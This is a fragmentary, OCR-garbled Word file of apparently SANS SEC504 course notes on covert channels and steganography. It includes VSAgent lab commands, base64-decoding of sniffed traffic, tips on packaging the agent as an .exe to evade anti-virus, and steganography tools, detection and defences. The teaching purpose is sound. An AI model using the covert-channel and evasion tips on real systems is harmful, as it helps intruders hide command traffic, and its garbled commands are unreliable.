clear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Very difficult to detect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If, for any reason, you need to remove results from a previous session please feel free to run the following command and restart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vsagent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/opt/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course_www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/SEC5O4/vsagent-504/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data.db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VSAgent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(II):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rootslingshot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# python /home/sec56e/CourseFiles/vsagent-504/vsagent-504.py http://127.O.,O.1/SEC5O4/vsagent—504/vssvc.php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Open another prompt and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sec504@slingshot:~$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firefox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http://192.168.159.131/SEC504/vsagent-504/vsgui.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C80F84" w:rsidRPr="00C80F84" w:rsidRDefault="00C80F84" w:rsidP="00C80F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Now, we will use Firefox to connect to the web UI for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VSAgent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tcpdump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lo -s0 -A host 127.0.0.1 | grep VIEWSTATE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Challenge!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Lab: Covert Channels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Run some commands and decode the data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Hints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The data is base64 encoded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There are characters that are hex-encoded characters (Le., linefeed, =, etc.).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can pollute the decoding of the base64 data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 offending characters will need to be removed or converted!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gsub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is your friend!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$ echo cat dog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dog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‘{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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gsub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>/cat/,”dog”)}1’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Will output dog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dog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dog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Base64 --decode will decode the data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It should look something like this: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t>— $ echo &lt;paste your string here&gt; | &lt;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command here&gt; | &lt;Base64 decode here&gt;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But, there is more than one path!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Ruby! Python! Perl!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Don’t forget to use the man pages!!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One Possible Solution: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rootsllngshot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:-# echo eyJjb%1tYW5kcyI6IFtdLCAiYWUThnQiOiAiMDA6MGM6Mjk6Nzk6M%U6NTkifQ3D%3D | |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'{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gsub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(/%0A/,"");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gsub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(/%3D/,"=")}1' | base64 --decode;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In Conclusion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Detecting and decoding covert channels can be hard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However, with a little work, we can peer into the commands of the bad guys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Please try out this tool at work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With permission, of course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You can convert the python script to .exe with tools like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pylnjector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pyinstaller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, and py2exe.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convert the python into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.exe and get real fancy with tools like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pyinstaller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pyInjector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and py2exe. The following link is an article on how to do this by Mark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Baggeft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(Luke’s dad):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http://pen-testing.sans.oru/blog/pen-testing/2013/07/12/anti-virus-evasion-a-peek-under-the-veil.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Covert Channel Defenses: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Containment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Delete attacker’s program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Look for program on other systems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Eradication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If attacker compromised admin/root account, rebuild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system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Recovery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Monitor system very closely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############################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Steganography (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Stego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):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Steganography abbreviated as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stego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, not to be confused with stenography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Involves concealing the fact that you are sending “sensitive” information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Data hiding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Can hide in a variety of formats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Images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  • BMP, GIF, JPEG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Word documents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Text documents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t>— Machine-generated images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(fractals, complex words of animals/flowers/people...)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Sample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Stego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Tools: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 following are some example programs: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Jsteg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— hides in jpeg images using the DCT coefficients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MP3Stego — hides in mpeg files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S-Mail — hides data in exe and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dil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Invisible Secrets — hides data in banner ads that appear on websites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Stash — hides data in a variety of image formats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Hydan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— hides data in UNIX/Linux and Windows executables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More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Stego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Tools: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There are a number of excellent tools for hiding data in a variety of different formats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Open$tego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— Embeds data and digital watermarks into images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SilentEye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Embeds encrypted data and other files into JPEG, BMP, and WAVE formats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OpenPuff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— Great support for images, audio, video, and flash-Adobe files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Also supports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multipassword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support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Plausible deniability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Multiple rounds of encryption with different algorithms for additional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stego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tools, check out the following site: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http://stegano.net/tools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Setgo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Example —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Hydan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Hydan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hides data in executables written for 1386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Written by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Rakan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E1-KhalIl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Supports *BSD, Linux, and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WinXP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Øp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http://www.crazyboy.com/hydan/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Start with an executable, as well as message to hide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Feed both through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Hydan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Hydan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encrypts the data with blowfish with user-provided passphrase, and then embeds the data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Result: one executable, same size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Take the resulting executable... it’ll still run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However, by sending it back through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Hydan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, the original message can be recovered.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How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Hydan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Hides Info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First off, it just encrypts the message using blowfish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Next, it uses polymorphic coding techniques to hide the data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Hydan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has several groups of functionally equivalent instructions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Add X, Y versus Sub X, -Y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By choosing an instruction from one group, we get a “zero” bit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t>• By choosing an instruction from another group, we get a “one” bit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Just encode all the bits like that!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Then, rewrite the polymorphic executable.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Efficienty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Rate and Detection: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Hydan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can hide one byte of data in approximately 150 bytes of code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It does alter the statistical pattern of instructions in a program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Think about how often you subtract a negative number (X minus —22)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Usually, you just add (X plus 22)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Therefore, there’s a possible signature here,..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Consider a histogram of instructions and how it would change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Craig S. Wright developed a tool for detecting these anomalies to identify “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Hydanized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” executables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Described at http://www.sans.org/reading_room/whitepapers/stenganography/detecting-hydan-statistical-methods-classifying-hydan-based-stegonagraphy-execut_32839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Detecting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Stego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StegExpose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: Java utility to detect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stego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in lossless images where Least Significant Bit (LSB) techniques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This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stego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is where the least significant bits, which determine color, are modified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This leads to a very slight (think imperceptible) change of color made to the original image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Supports a number of different “detectors” or mathematical analysis techniques to detect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stego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For quick analysis, it can also use “cheap” or quick analysis methods to detect the presence of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stego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Has the ability to run on a large number of files very quickly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It can be found here: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https://github.com/b3dk7/StegExpose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Defending Against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Stego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(I):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Preparation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Get familiar with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stego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tools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Look for changes to critical web server files (file integrity-checking tools)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Identification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If you have the original source image, detection is easy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Perform a cliff or file comparison and see whether they are different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MD5 or SHA-; hashes can help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Stego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might not change the size or make any observable changes, but it does change the data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Defending Against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Stego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(II)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•Identification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If you are working an HR or legal case, take direction from your legal team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Many times, this will involve watching a suspects system for an extended period of time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Remember S-Tools changes the number of near-duplicate colors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Not easy to do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Usually requires determining statistics or large number of clean files to come up with unique properties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Containment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Work with law enforcement and HR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Erad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Recov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>: Work with your company’s legal team.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Putting It All Together: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We’ve discussed each of these tools on a one-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byone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basis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 tools are seldom employed this way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They are often used together in very elaborate schemes to effectively undermine the security of an organization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We now go through two structured sample attacks, drawing on the ideas and tools we discuss throughout the course.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Mistake Number 10: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- this scenario could be written because of the data retrieved from logs.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information associated with the intrusion was available, but it was not analyzed until after the damage was done.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need to be proactive about log analysis.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References</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C80F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• Numerous podcasts provide in-depth information about security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Security Weekly Podcast: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http://www.securityweekly.com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Network Security Podcast: http://mckeay.libsyn.com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C80F84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Securabit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C80F84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Podcast: http://securabit.com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— Data Security Podcast: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>http://datasecurityblog.wordpress.com</w:t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</w:r>
      <w:r w:rsidRPr="00C80F84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">######################################### 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84"/>
    <w:rsid w:val="00C80F84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F6E8C-1DBA-473B-A900-7669A0A7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0F84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0F8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7072</Words>
  <Characters>40317</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>335</Lines>
  <Paragraphs>94</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>47295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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-13T23:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-13T23:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>